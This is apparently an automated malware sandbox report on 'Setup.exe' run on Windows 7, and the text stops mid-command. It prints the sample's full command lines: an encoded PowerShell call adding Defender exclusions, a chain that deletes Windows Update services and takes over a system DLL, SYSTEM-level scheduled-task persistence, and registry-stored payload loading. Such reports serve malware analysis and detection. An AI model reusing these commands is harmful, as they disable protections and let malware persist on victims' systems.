d4394564000ca31d1d78e78322c3c7bd6287bd0d700b02916cc889ddc2bf22d4

Analysis

max time kernel
151s
max time network
50s
platform
windows7_x64
resource
win7-20220414-en
submitted
29-04-2022 11:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

3.3MB
MD5

89253fded8cd7633cd774b34ec00d7ae
SHA1

36579483553c0f703604f439d9b5b46f088ab543
SHA256

d4394564000ca31d1d78e78322c3c7bd6287bd0d700b02916cc889ddc2bf22d4
SHA512

c79bb7809db89a10d65b268816336f3d952277ec55d65e1e21e6ff2a690c3767fdde08586daa3d4f77ee6d2d85d35aa8d870389ffcf7fb2888de5d16362e616f

Score

10^/10

discovery evasion exploit trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 864 created 416 864 powershell.EXE winlogon.exe
Executes dropped EXE 3 IoCs

Processes:

update.exeiexplore.exeiexplore.exe

pid process

908 update.exe
1832 iexplore.exe
2004 iexplore.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1192 takeown.exe
2024 icacls.exe
1360 takeown.exe
884 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 9 IoCs

Processes:

Setup.exeWerFault.execmd.exe

pid process

1640 Setup.exe
1640 Setup.exe
1100 WerFault.exe
1100 WerFault.exe
1100 WerFault.exe
1100 WerFault.exe
1100 WerFault.exe
1100 WerFault.exe
1676 cmd.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1192 takeown.exe
2024 icacls.exe
1360 takeown.exe
884 icacls.exe

description	pid	process	target process
PID 864 created 416	864	powershell.EXE	winlogon.exe

pid	process
908	update.exe
1832	iexplore.exe
2004	iexplore.exe

pid	process
1192	takeown.exe
2024	icacls.exe
1360	takeown.exe
884	icacls.exe

pid	process
1640	Setup.exe
1640	Setup.exe
1100	WerFault.exe
1100	WerFault.exe
1100	WerFault.exe
1100	WerFault.exe
1100	WerFault.exe
1100	WerFault.exe
1676	cmd.exe

pid	process
1192	takeown.exe
2024	icacls.exe
1360	takeown.exe
884	icacls.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

iexplore.exeiexplore.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

iexplore.exepowershell.EXEiexplore.exe

description	pid	process	target process
PID 1832 set thread context of 1032	1832	iexplore.exe	conhost.exe
PID 864 set thread context of 1196	864	powershell.EXE	dllhost.exe
PID 2004 set thread context of 1208	2004	iexplore.exe	conhost.exe

Drops file in Windows directory 5 IoCs

Processes:

conhost.exesvchost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1100 908 WerFault.exe update.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1820 schtasks.exe

pid	pid_target	process	target process
1100	908	WerFault.exe	update.exe

pid	process
1820	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e090a92bca5bd801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
756	reg.exe
1684	reg.exe
588	reg.exe
1768	reg.exe
696	reg.exe
2000	reg.exe
576	reg.exe
1580	reg.exe
800	reg.exe
1620	reg.exe
1800	reg.exe
1752	reg.exe
1980	reg.exe
1740	reg.exe
1876	reg.exe
968	reg.exe
1376	reg.exe
1032	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeiexplore.exepowershell.EXEdllhost.exepowershell.exepowershell.EXEiexplore.exe

pid	process
604	powershell.exe
1832	iexplore.exe
864	powershell.EXE
864	powershell.EXE
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1832	powershell.exe
1196	dllhost.exe
1196	dllhost.exe
1396	powershell.EXE
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
2004	iexplore.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe
1196	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetakeown.exeiexplore.exepowershell.EXEdllhost.exesvchost.exepowershell.exepowershell.EXEiexplore.exetakeown.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	604	powershell.exe
Token: SeTakeOwnershipPrivilege	1192	takeown.exe
Token: SeDebugPrivilege	1832	iexplore.exe
Token: SeDebugPrivilege	864	powershell.EXE
Token: SeDebugPrivilege	864	powershell.EXE
Token: SeDebugPrivilege	1196	dllhost.exe
Token: SeAuditPrivilege	876	svchost.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1396	powershell.EXE
Token: SeDebugPrivilege	2004	iexplore.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	1360	takeown.exe
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exeupdate.exeiexplore.execmd.execmd.exe

description	pid	process	target process
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 908	1640	Setup.exe	update.exe
PID 1640 wrote to memory of 1832	1640	Setup.exe	iexplore.exe
PID 1640 wrote to memory of 1832	1640	Setup.exe	iexplore.exe
PID 1640 wrote to memory of 1832	1640	Setup.exe	iexplore.exe
PID 1640 wrote to memory of 1832	1640	Setup.exe	iexplore.exe
PID 908 wrote to memory of 1100	908	update.exe	WerFault.exe
PID 908 wrote to memory of 1100	908	update.exe	WerFault.exe
PID 908 wrote to memory of 1100	908	update.exe	WerFault.exe
PID 908 wrote to memory of 1100	908	update.exe	WerFault.exe
PID 1832 wrote to memory of 1216	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 1216	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 1216	1832	iexplore.exe	cmd.exe
PID 1216 wrote to memory of 604	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 604	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 604	1216	cmd.exe	powershell.exe
PID 1832 wrote to memory of 2028	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 2028	1832	iexplore.exe	cmd.exe
PID 1832 wrote to memory of 2028	1832	iexplore.exe	cmd.exe
PID 2028 wrote to memory of 1668	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1668	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1668	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1840	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1840	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1840	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1856	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1856	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1856	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1852	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1852	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 1852	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 800	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 800	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 800	2028	cmd.exe	sc.exe
PID 2028 wrote to memory of 756	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 756	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 756	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1684	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1684	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1684	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 2000	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 2000	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 2000	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1980	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1980	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1980	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 576	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 576	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 576	2028	cmd.exe	reg.exe
PID 2028 wrote to memory of 1192	2028	cmd.exe	takeown.exe
PID 2028 wrote to memory of 1192	2028	cmd.exe	takeown.exe
PID 2028 wrote to memory of 1192	2028	cmd.exe	takeown.exe
PID 2028 wrote to memory of 2024	2028	cmd.exe	icacls.exe
PID 2028 wrote to memory of 2024	2028	cmd.exe	icacls.exe
PID 2028 wrote to memory of 2024	2028	cmd.exe	icacls.exe
PID 1832 wrote to memory of 1032	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 1032	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 1032	1832	iexplore.exe	conhost.exe
PID 1832 wrote to memory of 1032	1832	iexplore.exe	conhost.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:852

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1056

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:876

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
3⤵
PID:972

C:\Windows\system32\taskeng.exe
taskeng.exe {86A03DBD-9CB1-474A-90A9-8F658B6F176F} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:808

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
3⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1408

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0a4f411f-d3dc-424e-8895-9a152a62f7fb}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1640

C:\Users\Admin\AppData\Local\Temp\update.exe
C:\Users\Admin\AppData\Local\Temp\update.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 104
4⤵
- Loads dropped DLL
- Program crash
PID:1100

C:\Users\Admin\AppData\Local\Temp\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
4⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:1668

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:1840

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:1856

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:1852

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:800

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:756

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1684

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1980

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:576

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2024

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:588

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1740

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:756

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1876

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1460

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1784

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1752

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1848

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1988

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:1032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
4⤵
PID:988

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
5⤵
- Creates scheduled task(s)
PID:1820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
4⤵
- Loads dropped DLL
PID:1676

C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe
"C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"
5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN 